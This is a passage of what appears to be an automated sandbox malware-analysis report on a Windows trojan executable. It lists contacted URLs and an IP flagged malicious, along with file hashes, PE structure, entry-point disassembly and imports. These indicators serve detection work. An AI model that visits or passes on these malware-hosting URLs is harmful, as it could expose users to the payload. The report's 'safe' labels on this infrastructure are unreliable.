                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvskncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://www.pregrad.netopenUncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.240443204.00000000029B8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.289638766.0000000004F68000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293026511.0000000005550000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.251263320.0000000005388000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.292545915.0000000005344000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.326228795.000000000552E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.258002144.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.338081452.000000000547E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.337053722.0000000005478000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324769245.0000000005528000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.245693873.0000000004940000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, 
ncIpox4w8f.exe, 00000000.00000003.333581477.0000000005518000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.256226314.0000000005450000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/jncIpox4w8f.exe, 00000000.00000003.390661773.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384479510.00000000007D8000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvskotxencIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2yncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/cncIpox4w8f.exe, 00000000.00000003.450585994.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.455246680.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457658604.00000000007D9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/hncIpox4w8f.exe, 00000000.00000003.306711396.000000000080F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk2yncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2tncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                199.79.62.221 | vervain.co.in | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:679306
                Start date and time:2022-08-05 15:07:12 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 55s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:ncIpox4w8f (renamed file extension from none to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:25
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal80.troj.winEXE@1/0@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.223.24.244, 20.238.103.94
                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Execution Graph export aborted for target ncIpox4w8f.exe, PID 2916 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                15:08:19 | API Interceptor | 88x Sleep call for process: ncIpox4w8f.exe modified
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.977226984193113
                TrID:
                • Win32 Executable (generic) a (10002005/4) 90.27%
                • Win32 Executable Borland Delphi 7 (665061/41) 6.00%
                • Win32 Executable Borland Delphi 6 (262906/60) 2.37%
                • Windows ActiveX control (116523/4) 1.05%
                • Win32 Executable Delphi generic (14689/80) 0.13%
                File name:ncIpox4w8f.exe
                File size:1009664
                MD5:03fb0f9df279b56130a63d5330461789
                SHA1:705d9c59fe6cdeec9e28d1d803cb94765d1dc4de
                SHA256:59290e0709f6bc918c12c38604eaabcd79b77f699ca2f1abf3af4fccef444a94
                SHA512:7370210b461ad1f345c90aae2753da60f5319006acac31f36a55a8512b70dbac8ecc2c2a226e4e94a9f835c5185d79d93c24812ae6d7a1e0cee40b374dc9587d
                SSDEEP:24576:5DA1mchKTwkH17WtMBhiUDxvHiMYStUtVSn52pAf2rDNtl2aCHX:5Dhc8ZPbVI5Sn52KN
                TLSH:93258D32F2D24833C4B32B3C5E1B52A599397E102E74D88A6BED1D981FF96417D392C6
                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                Icon Hash:c49af2e8ece0e6c8
                Entrypoint:0x4a3b74
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:205f6434858f3f8cc9e8b96d094507a2
                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFF0h
                mov eax, 004A38D4h
                call 00007FB2DC6995D1h
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                call 00007FB2DC6FA311h
                mov ecx, dword ptr [004A59E0h]
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                mov edx, dword ptr [004A0C1Ch]
                call 00007FB2DC6FA311h
                mov eax, dword ptr [004A59E0h]
                mov eax, dword ptr [eax]
                call 00007FB2DC6F6D85h
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                call 00007FB2DC6FA379h
                call 00007FB2DC697034h
                lea eax, dword ptr [eax+00h]
                add byte ptr [eax], al
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa7000 | 0x27a4 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb9000 | 0x43000 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc1ec | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0xab000 | 0x18 | .rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                CODE | 0x1000 | 0xa2bc8 | 0xa2c00 | False | 0.5100101406490015 | data | 6.535344306379752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA | 0xa4000 | 0x1aa4 | 0x1c00 | False | 0.42703683035714285 | data | 4.101220909917565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS | 0xa6000 | 0xef5 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0xa7000 | 0x27a4 | 0x2800 | False | 0.3671875 | data | 5.001062777293974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls | 0xaa000 | 0x40 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata | 0xab000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.2005819074398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc | 0xac000 | 0xc1ec | 0xc200 | False | 0.5179606958762887 | data | 6.616954325025841 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc | 0xb9000 | 0x43000 | 0x43000 | False | 0.5515610424440298 | data | 7.271052678577541 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country
                AUDIOES | 0xb9d88 | 0x3697c | RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz | English | United States
                RT_CURSOR | 0xf0704 | 0x134 | data | |
                RT_CURSOR | 0xf0838 | 0x134 | data | |
                RT_CURSOR | 0xf096c | 0x134 | data | |
                RT_CURSOR | 0xf0aa0 | 0x134 | data | |
                RT_CURSOR | 0xf0bd4 | 0x134 | data | |
                RT_CURSOR | 0xf0d08 | 0x134 | data | |
                RT_CURSOR | 0xf0e3c | 0x134 | data | |
                RT_BITMAP | 0xf0f70 | 0x1d0 | data | |
                RT_BITMAP | 0xf1140 | 0x1e4 | data | |
                RT_BITMAP | 0xf1324 | 0x1d0 | data | |
                RT_BITMAP | 0xf14f4 | 0x1d0 | data | |
                RT_BITMAP | 0xf16c4 | 0x1d0 | data | |
                RT_BITMAP | 0xf1894 | 0x1d0 | data | |
                RT_BITMAP | 0xf1a64 | 0x1d0 | data | |
                RT_BITMAP | 0xf1c34 | 0x1d0 | data | |
                RT_BITMAP | 0xf1e04 | 0x1d0 | data | |
                RT_BITMAP | 0xf1fd4 | 0x1d0 | data | |
                RT_BITMAP | 0xf21a4 | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
                RT_ICON | 0xf228c | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                RT_ICON | 0xf4834 | 0x988 | data | |
                RT_ICON | 0xf51bc | 0x468 | GLS_BINARY_LSB_FIRST | |
                RT_DIALOG | 0xf5624 | 0x52 | data | |
                RT_STRING | 0xf5678 | 0x114 | data | |
                RT_STRING | 0xf578c | 0x3d0 | data | |
                RT_STRING | 0xf5b5c | 0x554 | data | |
                RT_STRING | 0xf60b0 | 0x3cc | data | |
                RT_STRING | 0xf647c | 0x1d4 | data | |
                RT_STRING | 0xf6650 | 0x180 | data | |
                RT_STRING | 0xf67d0 | 0x314 | COM executable for DOS | |
                RT_STRING | 0xf6ae4 | 0x4f4 | data | |
                RT_STRING | 0xf6fd8 | 0x1c0 | data | |
                RT_STRING | 0xf7198 | 0xec | data | |
                RT_STRING | 0xf7284 | 0x134 | data | |
                RT_STRING | 0xf73b8 | 0x314 | data | |
                RT_STRING | 0xf76cc | 0x40c | data | |
                RT_STRING | 0xf7ad8 | 0x380 | data | |
                RT_STRING | 0xf7e58 | 0x3d4 | data | |
                RT_STRING | 0xf822c | 0x250 | data | |
                RT_STRING | 0xf847c | 0xec | data | |
                RT_STRING | 0xf8568 | 0x1dc | data | |
                RT_STRING | 0xf8744 | 0x3ec | data | |
                RT_STRING | 0xf8b30 | 0x3f4 | data | |
                RT_STRING | 0xf8f24 | 0x30c | data | |
                RT_STRING | 0xf9230 | 0x328 | data | |
                RT_RCDATA | 0xf9558 | 0x10 | data | |
                RT_RCDATA | 0xf9568 | 0x370 | data | |
                RT_RCDATA | 0xf98d8 | 0x16ad | Delphi compiled form 'TForm1' | |
                RT_RCDATA | 0xfaf88 | 0x2c3 | Delphi compiled form 'TForm2' | |
                RT_RCDATA | 0xfb24c | 0x39e | Delphi compiled form 'TForm3' | |
                RT_RCDATA | 0xfb5ec | 0x2d0 | Delphi compiled form 'TForm4' | |
                RT_GROUP_CURSOR | 0xfb8bc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                RT_GROUP_CURSOR | 0xfb8d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                RT_GROUP_CURSOR | 0xfb8e4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                RT_GROUP_CURSOR | 0xfb8f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                RT_GROUP_CURSOR | 0xfb90c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                RT_GROUP_CURSOR | 0xfb920 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                RT_GROUP_CURSOR | 0xfb934 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
                RT_GROUP_ICON | 0xfb948 | 0x30 | data | |
                RT_VERSION | 0xfb978 | 0x498 | data | German | Germany
                DLL | Import
                kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                gdi32.dll | UnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
                user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, 